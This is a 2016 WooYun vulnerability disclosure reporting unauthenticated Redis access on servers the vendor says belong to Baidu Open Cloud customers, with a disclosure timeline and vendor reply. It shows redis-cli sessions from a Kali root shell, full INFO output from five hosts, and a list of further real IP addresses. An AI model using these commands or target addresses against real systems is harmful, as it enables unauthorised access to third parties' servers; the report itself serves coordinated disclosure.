当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195847

漏洞标题:百度多台Redis服务器未授权访问

相关厂商:百度

漏洞作者: 路人甲

提交时间:2016-04-13 16:34

修复时间:2016-05-28 19:20

公开时间:2016-05-28 19:20

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 细节向公众公开

简要描述:

百度多台服务器漏洞

详细说明:

redis未授权访问:
IP:180.76.140.233

x1.png


x2.png


root@kali:~/.ssh# redis-cli -h 180.76.140.233 -p 6379
180.76.140.233:6379> info
# Server
redis_version:2.8.4
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a44a05d76f06a5d9
redis_mode:standalone
os:Linux 3.13.0-32-generic x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.8.2
process_id:24318
run_id:8fe479471888bb4edc00af947ca7aea4e2541274
tcp_port:6379
uptime_in_seconds:6657827
uptime_in_days:77
hz:10
lru_clock:1349883
config_file:
# Clients
connected_clients:3
client_longest_output_list:0
client_biggest_input_buf:44
blocked_clients:1
# Memory
used_memory:544768
used_memory_human:532.00K
used_memory_rss:1638400
used_memory_peak:1237600
used_memory_peak_human:1.18M
used_memory_lua:38912
mem_fragmentation_ratio:3.01
mem_allocator:jemalloc-3.4.1
# Persistence
loading:0
rdb_changes_since_last_save:10478
rdb_bgsave_in_progress:0
rdb_last_save_time:1454398032
rdb_last_bgsave_status:err
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
# Stats
total_connections_received:2166
total_commands_processed:38777
instantaneous_ops_per_sec:0
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:1
evicted_keys:0
keyspace_hits:12138
keyspace_misses:7057
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:196
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:1419.20
used_cpu_user:1636.42
used_cpu_sys_children:292.56
used_cpu_user_children:166.27
# Keyspace
db0:keys=1,expires=0,avg_ttl=0


IP:182.61.9.225

root@kali:~/.ssh# redis-cli -h 182.61.9.225 -p 6379
182.61.9.225:6379> info
# Server
redis_version:3.0.5
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a46578aeaeed0f67
redis_mode:standalone
os:Linux 2.6.32-431.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:22404
run_id:3e7fda016038c7bc6fb37480fb4bcb4199f909f3
tcp_port:6379
uptime_in_seconds:1786283
uptime_in_days:20
hz:10
lru_clock:916177
config_file:/etc/redis.conf
# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:901120
used_memory_human:880.00K
used_memory_rss:2678784
used_memory_peak:949112
used_memory_peak_human:926.87K
used_memory_lua:36864
mem_fragmentation_ratio:2.97
mem_allocator:libc
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1460525179
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:7213
total_commands_processed:7534
instantaneous_ops_per_sec:0
total_net_input_bytes:398687
total_net_output_bytes:126621
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:43
evicted_keys:0
keyspace_hits:633
keyspace_misses:3
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:215
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:507.02
used_cpu_user:330.11
used_cpu_sys_children:0.09
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0


IP:180.76.149.53

root@kali:~/.ssh# redis-cli -h 180.76.149.53 -p 6379
180.76.149.53:6379> info
# Server
redis_version:3.0.6
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:5c7eaa2e19cb5102
redis_mode:standalone
os:Linux 2.6.32-431.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:1732
run_id:beb0c8ab0beb39c0e67978f94e8d52b5d6b80fc0
tcp_port:6379
uptime_in_seconds:6734471
uptime_in_days:77
hz:10
lru_clock:916289
config_file:/home/wwwroot/www.shell.com/redis-3.0.6/redis.conf
# Clients
connected_clients:3
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:917904
used_memory_human:896.39K
used_memory_rss:2617344
used_memory_peak:949696
used_memory_peak_human:927.44K
used_memory_lua:36864
mem_fragmentation_ratio:2.85
mem_allocator:libc
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1460470546
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:1
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_current_size:70952
aof_base_size:0
aof_pending_rewrite:0
aof_buffer_length:0
aof_rewrite_buffer_length:0
aof_pending_bio_fsync:0
aof_delayed_fsync:0
# Stats
total_connections_received:910
total_commands_processed:1109
instantaneous_ops_per_sec:0
total_net_input_bytes:101816
total_net_output_bytes:214890
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:14
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:384
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:5805.96
used_cpu_user:2799.02
used_cpu_sys_children:0.14
used_cpu_user_children:0.05
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=1,expires=0,avg_ttl=0


ip:180.76.150.114

root@kali:~/.ssh# redis-cli -h 180.76.150.114 -p 6379
180.76.150.114:6379> info
# Server
redis_version:2.8.19
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:edaf234646095212
redis_mode:standalone
os:Linux 2.6.32-431.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:25344
run_id:67e5ec4c3834b9726edffc0ee3fb92b8ebc7ca51
tcp_port:6379
uptime_in_seconds:14007210
uptime_in_days:162
hz:10
lru_clock:916339
config_file:/etc/redis.conf
# Clients
connected_clients:43
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:1878720
used_memory_human:1.79M
used_memory_rss:7864320
used_memory_peak:7404136
used_memory_peak_human:7.06M
used_memory_lua:35840
mem_fragmentation_ratio:4.19
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1460364014
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:459173997
total_commands_processed:873581211
instantaneous_ops_per_sec:46
total_net_input_bytes:31283716245
total_net_output_bytes:567422830645
instantaneous_input_kbps:1.18
instantaneous_output_kbps:18.84
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:2112479520
keyspace_misses:17
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:340
# Replication
role:slave
master_host:121.40.56.18
master_port:6379
master_link_status:up
master_last_io_seconds_ago:1
master_sync_in_progress:0
slave_repl_offset:11671009
slave_priority:100
slave_read_only:1
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:89698.45
used_cpu_user:38758.61
used_cpu_sys_children:2.06
used_cpu_user_children:0.68
# Keyspace
db0:keys=440,expires=0,avg_ttl=0


ip:180.76.147.42

root@kali:~/.ssh# redis-cli -h 180.76.147.42 -p 6379
180.76.147.42:6379> info
# Server
redis_version:2.5.14
redis_git_sha1:21645232
redis_git_dirty:0
redis_mode:standalone
os:Linux 3.11.0-15-generic x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.6.3
process_id:13481
run_id:52eb35d50863a823ec6fbccbc7faae2a3e5b8e61
tcp_port:6379
uptime_in_seconds:3129468
uptime_in_days:36
lru_clock:1349929
# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:564560
used_memory_human:551.33K
used_memory_rss:2146304
used_memory_peak:645216
used_memory_peak_human:630.09K
used_memory_lua:31744
mem_fragmentation_ratio:3.80
mem_allocator:jemalloc-3.0.0
# Persistence
loading:0
rdb_changes_since_last_save:85
rdb_bgsave_in_progress:0
rdb_last_save_time:1460534001
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:1
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_current_size:27831065
aof_base_size:0
aof_pending_rewrite:0
aof_buffer_length:0
aof_rewrite_buffer_length:0
aof_pending_bio_fsync:0
aof_delayed_fsync:0
# Stats
total_connections_received:2146
total_commands_processed:342802
instantaneous_ops_per_sec:0
rejected_connections:0
expired_keys:0
evicted_keys:0
keyspace_hits:992383
keyspace_misses:194
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:265
# Replication
role:master
connected_slaves:0
# CPU
used_cpu_sys:4661.32
used_cpu_user:2119.40
used_cpu_sys_children:1.70
used_cpu_user_children:0.11
# Keyspace
db0:keys=6,expires=0


180.76.145.62
182.61.29.196
180.76.128.189
180.76.190.64
182.61.11.94
180.76.157.68
180.76.189.225
180.76.149.110
180.76.173.112
182.61.2.64
182.61.25.194
180.76.150.168
180.76.137.209
180.76.161.242

x3.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2016-04-13 19:15

厂商回复:

感谢提交,这些IP皆为百度开放云上的客户服务,我们已紧急多次联系客户修复漏洞,客户正在修复中。为了保护我们的客户,我们确认漏洞,避免忽略漏洞造成的客户损失。非常感谢您的提交

最新状态:

暂无